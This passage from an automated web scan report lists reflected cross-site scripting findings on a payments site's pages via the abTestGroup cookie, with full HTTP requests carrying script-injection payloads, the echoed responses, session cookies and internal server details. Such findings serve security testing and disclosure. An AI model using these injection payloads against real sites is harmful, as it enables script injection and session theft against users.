Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16e3bfc"><script>alert(1)</script>2691f2a62ad;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:33 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=mj0unVAWHa0hO+XWAF87xQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:34 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E35820A0805192AA117E3A09F0E66
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 128379


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<input id="testGroup" value="T16e3bfc"><script>alert(1)</script>2691f2a62ad" type="hidden" />
...[SNIP]...

1.68. http://payments.intuit.com/apply-now/ [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload b8e7d<script>alert(1)</script>1a9cb1ed9ff was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /apply-now/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16b8e7d<script>alert(1)</script>1a9cb1ed9ff;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:17 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=bkNCK07OCYlhWgd9BRZ2Jg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:18 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95FCE130A0805192AA117E35B0EC2E7
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 128365


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<br />
       A/B Test Group: T16b8e7d<script>alert(1)</script>1a9cb1ed9ff<br />
...[SNIP]...

1.69. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d50dd"><script>alert(1)</script>0da146df87f was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d50dd"><script>alert(1)</script>0da146df87f;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:59:01 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=N5kpkn1f65UWezK4PWrIhQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:36:02 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95AF8AF0A0805192AA117E3D0164F8A
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161404


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<input id="testGroup" value="T16d50dd"><script>alert(1)</script>0da146df87f" type="hidden" />
...[SNIP]...

1.70. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 5bab0<script>alert(1)</script>ddd1b3cb4d0 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T165bab0<script>alert(1)</script>ddd1b3cb4d0;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:02 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=1powooXFBn-h-hwDYnv+xw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:03 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95CD1C50A0805192AA117E35710C64D
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161391


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<br />
       A/B Test Group: T165bab0<script>alert(1)</script>ddd1b3cb4d0<br />
...[SNIP]...

1.71. http://payments.intuit.com/apply-now/contact-me.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/contact-me.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 985ed"><script>alert(1)</script>23bad0dfc93 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /apply-now/contact-me.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16985ed"><script>alert(1)</script>23bad0dfc93;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:58:48 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=D7wXCvj0JH7i3uKdbQ-emg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:35:49 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95AC6930A0805192AA117E366D30E15
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=contact_002dme_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 93343


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<input id="testGroup" value="T16985ed"><script>alert(1)</script>23bad0dfc93" type="hidden" />
...[SNIP]...

1.72. http://payments.intuit.com/apply-now/contact-me.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/contact-me.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload dbc30<script>alert(1)</script>a86e2fa9ef0 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /apply-now/contact-me.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16dbc30<script>alert(1)</script>a86e2fa9ef0;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:10 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=oxD02Vt1dG7QQnxJWJEH5g**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:11 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C08810A0805192AA117E374365C21
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=contact_002dme_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 93328


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<br />
       A/B Test Group: T16dbc30<script>alert(1)</script>a86e2fa9ef0<br />
...[SNIP]...

1.73. http://payments.intuit.com/products/ [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 20d8b<script>alert(1)</script>07ae2d24ce9 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1620d8b<script>alert(1)</script>07ae2d24ce9;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:58:39 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=nQy7xY0qaIGSmjWmG8-mmg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:35:40 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95AA5C10A0805192AA117E3A4E9C6F1
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 90419


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<br />
       A/B Test Group: T1620d8b<script>alert(1)</script>07ae2d24ce9<br />
...[SNIP]...

1.74. http://payments.intuit.com/products/ [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 880a1"><script>alert(1)</script>9e7870cf12f was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16880a1"><script>alert(1)</script>9e7870cf12f;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:57:27 GMT
Server: Apache
